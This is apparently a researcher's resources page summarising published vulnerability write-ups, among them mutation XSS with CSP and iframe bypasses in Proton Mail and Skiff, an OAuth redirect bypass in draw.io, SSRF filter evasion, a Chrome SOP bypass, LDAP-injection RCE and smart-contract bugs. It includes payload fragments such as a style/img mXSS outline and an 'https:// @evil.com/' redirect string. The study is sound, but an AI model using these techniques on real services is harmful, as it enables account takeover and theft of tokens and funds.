Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Socket Incident Report 16 Jan- 1325

SocketTech    Reference →Posted 2 Years Ago
  • Socket Tech allows for interoperability between all of the major wallets. On January 16th, they were exploited in a major way.
  • Socket Gateway hosts various modules that can only be added by administrators. When deploying these modules, a developer first deploys it then the admin will attach it to the contract.
  • The goal was to update the contract WrapperTokenSwappgerImpl. When doing this, the development team had a mixup on which version was should be deployed - a pre-review vs post-review. For whatever reason, the pre-view module got added and attached to the contract.
  • The original code had an arbitrary call vulnerability where the address being called and the data, such as the selector, could be set. As a result, an attacker called transferFrom() on all of the token contracts that had large approvals from users. This is a good example on why approvals on tokens should NOT be infinite.
  • Overall, the bug is pretty simple. The interesting part to me is how the bug got released into the wild. The team had reviewed the code and found the bug but released the wrong version. I suppose a more rigorous CI/CD program for deployment could have stopped this issue.

ECDSA is Weird- 1324

Kelby Ludwig    Reference →Posted 2 Years Ago
  • ECDSA has many unexpected properties that can cause security issues if people are not completely sure on how it works. I can imagine that many of these issues being found in blockchain-land, since the public nature of all data gives everyone more access to data than anticipated.
  • The first, and most well-known issue, is signature malleability. All EC curves are y2=x3 + Ax + B. Because of the y2, the entire curve is reflected over the x axis perfectly. As a result, there are always two valid points or two valid signatures. The math to generate the other point is trivial to do.
  • In blockchain, the usage of signatures is common. To prevent replay and double spend attacks, the verification of the orientation of the signature is crucial. Otherwise, using the signature as a key can create a duplicate signature to bypass the scheme.
  • Given a signature, it's trivial to generate a keypair that has the same signature for a chosen message. In our replay attack example, this doesn't do us any good. However, if there is a scheme that assumes signatures are unique and anybody can call it, then this can be a problem. Now, we have the ability to create arbitrary messages with the same signature. Super weird issue but interesting in practice.
  • The next one is not as common but pops up from time to time. It's super important to hash the data that is provided in and NOT trust an incoming hash. If a hash is supposed to be trusted then an attacker can generate signatures for arbitrary private keys. One of the examples is an app that tries to prove that they created Bitcoin to spoof the Satoshi address.
  • The final two have to do with knowledge of the random k value. Any knowledge of the random can makes it trivial to find the private key. Additionally, if two signatures have the same k from a user then it's also trivial to recover the private key using similar techniques.
  • All of the issues above have a POC in the code, which is super nice as well. Cryptography is absolute black magic and we all need to be careful when using it. The author also linked this as inspiration, which has lots more content about cryptography issues.

Permission denied - The story of an EIP that sinned- 1323

Trust Security    Reference →Posted 2 Years Ago
  • EIP-2612 is an extension of the ERC20 standard that adds in the Permit() function. This removes the burden of paying for gas on a call to approve(). Instead, a user can sign offline a permit signature, give it to a user and make it usable for them to transfer funds from their account. Good idea that saves lots of gas!
  • There are two key items to verify: the signature is valid and the deadline has not passed. Crucially, the msg.sender of the call does NOT need to be validated. This is a known limitation but was brushed off, as "The end result is the same for the Permit signer..." The authors of this post asked themselves if this is true or not.
  • Many times, the call to Permit() is in the middle of lots of other code. So, if an attacker frontruns the call to the other function, extracts the signature and uses this signature directly on the call to Permit(), they would lose the ability to use the functionality after that point. The authors went around and starting looking for cases of this being true.
  • The case they saw over and over again was within custom EIP712 functions, mostly in deposit() functions. With these, there's a permit, a transfer then some custom logic. In the example, the logic called _creditUser(). Since we can frontrun this call, the final step will never happen, losing the user some value.
  • The author has a very good point on this: "The issue is a great example of how important it is to be security-focused when defining widely used standards." When creating ideas for everyone to use, they better be well-thought out. The payouts were mixed for the reports. Some paid, were supposed to by Immunefi and didn't... Just how the life of a bug bounty hunter goes.
  • They claim this falls under the griefing category, which is a medium severity. This is simply a bug that can be used to hurt an individual user or protocol for a small period of time but has no incentive or profit from an attacker. To me, this doesn't fall under the griefing category, since they permanently lose access to the functionality. Overall, good write up on an issue that appears to be everywhere. I'm curious to see if this will turn into the ERC20 approval frontrun bug in terms of reporting.

Code Vulnerabilities Put Proton Mails at Risk- 1322

Paul Gerste - Sonar Source    Reference →Posted 2 Years Ago
  • Proton Mail is a privacy-centric email service. Being able to extract secrets from this service, where it's supposed to be secret, would be devastating. Under the hood, it uses the state-of-the-art HTML sanitizer DOMPurify in order to avoid XSS on incoming emails.
  • After doing the sanitization via DOMPurify, the author noticed that some DOM manipulation was being done. In particular, the code would find <svg> and replace them with <proton-svg>. It may be possible to use this to break the parsing of the HTML!
  • HTML has its own parsing rules. However, SVG and MathML have their own rules. For the <style> tag, the parsing is different when seeing a closing tag. In HTML, the text in the next closing style tag will end. In SVG, it can contain child elements. Seeing the code in different contexts can cause major issues.
  • When the element is changed from an svg to proton-svg, major changes occur to the parsing. Using the payload <style><a alt="</style><img..."> and changing the context will cause the style to get parsed differently. Originally, the text was kept in for svg, since it was valid. But, the transformation leads to issues with the context, potentially leading to XSS.
  • Adding a <onerror="javascript..."> will now lead to XSS! But, we still have two more lines of defense. First, there's an iframe. Second, there's a CSP. For the iFrame on Safari, it adds the directive allow-scripts directive, which allows attackers to execute JS to access the top frame.
  • The allow-popups-to-escape-sandbox element allows JS to access the other page that popped the iFrame. For other browsers, the attacker needs a victim to click on a link that opens in a new tab, which will then access the rest of the content on the website.
  • The final thing is bypassing the CSP. The CSP restricts which origins information can be loaded from. In the CSP, the blob URi was allowed for scripts. They are temporary URLs that can be dynamically created at a link then used. If we can convince the browser to load our blob, we'd be able to execute arbitrary JS.
  • The blob URLs are placed at long UUIDs. Since these are random, we need a way to know where these are. In order to do this, the author used the ability to render remote images and inline styles to leak the original URL. Then, later, use this blob URL in a different payload.
  • Overall, an awesome post on contexts for HTML parsers, escaping iFrame sandboxes and CSP bypasses. I really enjoyed the post and learned a ton along the way.

draw.io CVEs- 1321

lude.rs    Reference →Posted 2 Years Ago
  • Draw.io is a website for drawing diagrams. The first vulnerability is a simple SSRF bug because of a bad and manual blacklisting technique. The second issue is much cooler though.
  • The website supports OAuth from third party providers like Github. If we can force a redirect during this flow, we can steal the OAuth token, which would be awesome. However, it's not legal to put an absolute URL - only relative URLs. Regardless, the author decided to take a look at this to see if they could bypass this.
  • The verification of this code checks to see if the URL is absolute or not. The library doing this follows the specification perfectly. If it's an invalid URL, then the code assumes it's a relative path! So, what if we found a URL that was invalid but was processed as a absolute path by the browser?
  • The author did some fuzzing and manual testing of this. Chrome is ever nice and does not conform to the RFC! In particular, if there is a space after the protocol, it will just remove the space. However, this is an invalid URL, which triggers our error. An example is https:// @evil.com/, with the space being the important thing here.
  • Since the check is bypassed for an absolute URL, the redirect will be made to an attacker controlled website. This steals the OAuth code, leading to a compromise of the user. Overall, amazing post on the bug. I love the idea of "what if we have an invalid URL by the RFC but valid to Chrome?" Even though the issue was not immediately exploitable, the idea from the bad error handling was there.

Code Vulnerabilities Put Skiff Emails at Risk- 1320

Paul Gereste - Sonar Source    Reference →Posted 2 Years Ago
  • Skiff is an email provider that really doesn't want XSS on their website. First, they sanitize their emails using DOMPurify. After that, they do various transformations on the data, which is the crux of the issue. They stick the email rendering into an iFrame and have a good CSP as well. Let's bypass all of them!
  • Mutation XSS (mXSS) is a type of XSS that results from taking information, but the browser fixing the markup changes the expected meaning of it. A good example of this can be seen here.
  • In Skiff, the content is ran through DOMPurify then processed some more. During this processing, the previously quoted emails are put into a thread, which inserts an empty div before the first element with the parameters data-injected-id=last-email-quote. So, what's the big deal with this small change?
  • In HTML, a div is invalid within an svg tag. So, if the browser sees this it will move the entire div element outside of the svg. Many of the elements within the svg that are safe there are unsafe in the normal context. Using some weirdness with style tags closing within double quotes in the HTML context but not the SVG context allows for the smuggling of an image tag with a onerror event! This gives us XSS within the iFrame.
  • The iFrame for Skiff has three directives on it: allow-same-origin, allow-popups and allow-popups-to-escape-sandbox. The goal is to get code that we can execute on the page. To do this, they first noticed that images are rendered as inline blobs. Since blobs inherit the origin they are on, we can create an attachment with the necessary information in a blob. The blobs have a random UUID though. So, using a technique in a previous post, they use CSS to leak the UUID to themselves.
  • Once they know the UUID of the attachment, they put the attachment into a link for the victim to click in a follow-up email. By having the link contain target="_blank", this will be opened in another tab with the content being controlled by us.
  • The final thing was bypassing the CSP. The CSP contains script-src 'unsafe-eval' http://hcaptcha.com. This is known to have an XSS gadget. So, an attacker can simply use one of these existing functions to get the XSS working.
  • Overall, a pretty crazy XSS bug with a full CSP bypass and sandbox escape. To me, CSPs and iFrames seem unescapable. So, finding posts that circumvent these protections is pretty amazing.

SSRF Cross Protocol Redirect Bypass- 1319

Szymon Drosdzol - doyensec    Reference →Posted 2 Years Ago
  • Server side request forgery (SSRF) is a popular and impactful vulnerability when used correctly. In order to prevent this attack, processing is done on the URLs to ensure that no internal URLs are used. The title of this post says it all: switching protocols to bypass protections.
  • One common bypass is reaching out to a public domain then redirecting to an internal IP. The authors of this post had found this multiple times then asked them to use the anti-SSRF libraries ssrfFilter which appeared to solve the problem.
  • When messing around with the library, going from HTTP to HTTP was blocked for localhost redirects. However, going from HTTPs to HTTP (or vice verse) on localhost wasn't blocked.
  • What happened? Within the request library, whenever the protocol is changed the request agent is deleted to ensure the right client is used. However, the SSRF prevention is based on the agents createConnection event handler! So, the SSRF mitigation strategy doesn't work since the hook is never called.
  • Overall, a fairly crazy/weird bypass in the protections for SSRF issues. Sometimes, dynamic blackbox testing with weird things is more fruitful than seeing the code. There's no way anybody could have found this reading the code as a security researcher.

CVE-2022-4908: SOP bypass in Chrome using Navigation API- 1318

Johan Carlsson    Reference →Posted 2 Years Ago
  • The Navigation API is supposed to be a replacement for the old History API. This is supposed to solve the problems of SPA client-side navigations. The navigation.entries() function is used to access a list of the history for a given windows session. Ideally, this will only given history entries for pages that have the same origin as the current page. Each history entry contains the full URL including fragments, making it ripe for attack.
  • When reading the specification, the author noticed the the API allows for the interception of navigation events. Immediately, the author thought of this as a good potential for abuse. It could be violating SOP, redirecting navigations and more.
  • The author tried some things but found a post by Gareth Hayes with a tool. Using some ideas from this, they setup an iFrame, setup a hijacker on the iFrame for the navigation API then redirected it to about:blank. Upon doing this, they history array was returned!
  • The history API would only be returned for items that were sameSite instead of sameOrigin. Still, getting XSS or a subdomain takeover then using this could leak information cross origin, which is pretty bad. For OAuth, which commonly has secrets in the URL, this would be a complete account takeover if somebody visited the website.
  • They decided to test this with an imaginary XSS on Gitlab forums to the real Gitlab. By having XSS (again, not a real one) on the forums, the OAuth codes could be exfiltrated from the history information of the navigation API. They also learned the difference between a eTLD and a TLD for samesite, which is not talked about as much as it should be.
  • To really drive home the point, they wanted to find something worse and real to exploit this. codesandbox.io hosts code that can be executed by others on subdomains. If a user was logged in to the site via an SSO provider like Github or Google, an attacker could access the history information with the OAuth codes from the history! Damn, that's real bad. It should be noted that a window reference is all that is needed; either through opening a tab or an iFrame.
  • The ticket has some insight into what happened. When copying information for the entries in the about:blank navigation, the developer did not consider a cross-origin request could be made. Luckily enough, site isolation (which isolates processes for different origins) prevents leaks cross origin.
  • Overall, a super interesting vulnerability that actually has some real impact. Following your gut for features that look dangerous works out a lot of the time!

RCE via LDAP truncation on hg.mozilla.org- 1317

joernchen     Reference →Posted 2 Years Ago
  • The author got code access from a friend to some of the Mozilla infrastructure. They use SCM for version control, which is where the bug is at.
  • pash appears to be a small shell that was used for handling SCM operations for hg.mozilla.org. One function allows users to clone private repos of a given user.
  • The user controls some input being read via SSH. In particular, the user is completely user controlled. When checking to see if the user exists via ldap, the author thought they had LDAP injection at first. However, characters necessary for this were being filtered out. So, what can we do?
  • When doing the processing, the filtration can be bypassed by injecting in nullbytes. The interpretation of the nullbyte will stop the processing within the filtering calls. It should be noted that the nullbyte is encoded and escaped for the LDAP syntax. However, when being used in the LDAP query, it's interpreted like normal. What does this mean?
  • The filtering of the bad characters in the LDAP query can be bypassed to get LDAP injection. With the LDAP injection, we can trick the query to return true with our user but contain other malicious information. In particular, command injection can be done within the rest of this script, which assumed that no user could have malicious characters.
  • To me, the filtering on the command should have been done no matter. You can't rely on valid users, as issues like this one may occur. I asked the author how they thought of this issue. The author said he was reading LDAP specifications, saw you can encode arbitrary bytes then just tried it on their local environment. To me, the takeaway is just trying lots of things and seeing the results of this with a good test env.

What is HTML Over the Wire? A brief history of web app tech.- 1316

bountyplz    Reference →Posted 2 Years Ago
  • Back in the day, websites were truly static, with only HTML and CSS being returned. Over time, responsive web design became a thing with AJAX/XHR requests being made in the background to get the information for the page. The Single Page Application (SPA) is extremely common to see now-a-days and that uses this pattern.
  • SPAs are snappy and react quickly. However, collecting data from the server takes time after all of the parsing things to be done. The frameworks for this are quite heavy as well. So, something new has gained popularity: HTML Over the Wire (FROW).
  • FROW is an architecture that attempts to combine to pre-rendering of HTML and the quickness of SPAs. It tries to render the HTML for the initial page on the backend but contains the ability to alter the page in an SPA-style fashion for dynamic portions. Hotwire Turbo, Unpoly, HTMLX and many other libraries take this approach.
  • Clicking links is kind of weird with this architecture. Should it reload the page like an old webpage or act like an SPA? Most of the libraries fire off a fetch() in the background then update the UI without reloading the page. This overwrites the default functionality of just making a GET request.
  • In order to support this, the FROW libraries add custom HTML attributes in order to allow for changing and editing of the fetch() request being made. For instance, you can change the method being used, the headers and more. The functionality is only intercepted from the browser if the origin of the path is the same as an internal meta tag.
  • To top this off, CSRF tokens are added into a header of the request automatically for most of these FROW apps. So, here's the idea: can we trick the application to send a user CSRF tokens on the request by poisoning the allowed domains?
  • On Turbo Drive, the turbo-root is can be set in a meta tag. According to the author, they've seen cases where it's possible for control this location as an attacker. Since the application thinks this is a trusted link, it will send the CSRF token alongside it.
  • On HTMX, the same thing can happen. If the link of the request can be set and the csrf token is supposed to be in the body, then it will blindly send it. Overall, an interesting post on the integration of technology causing weird issues. I'm not sure how exploitable this really is, since many things have to come together though.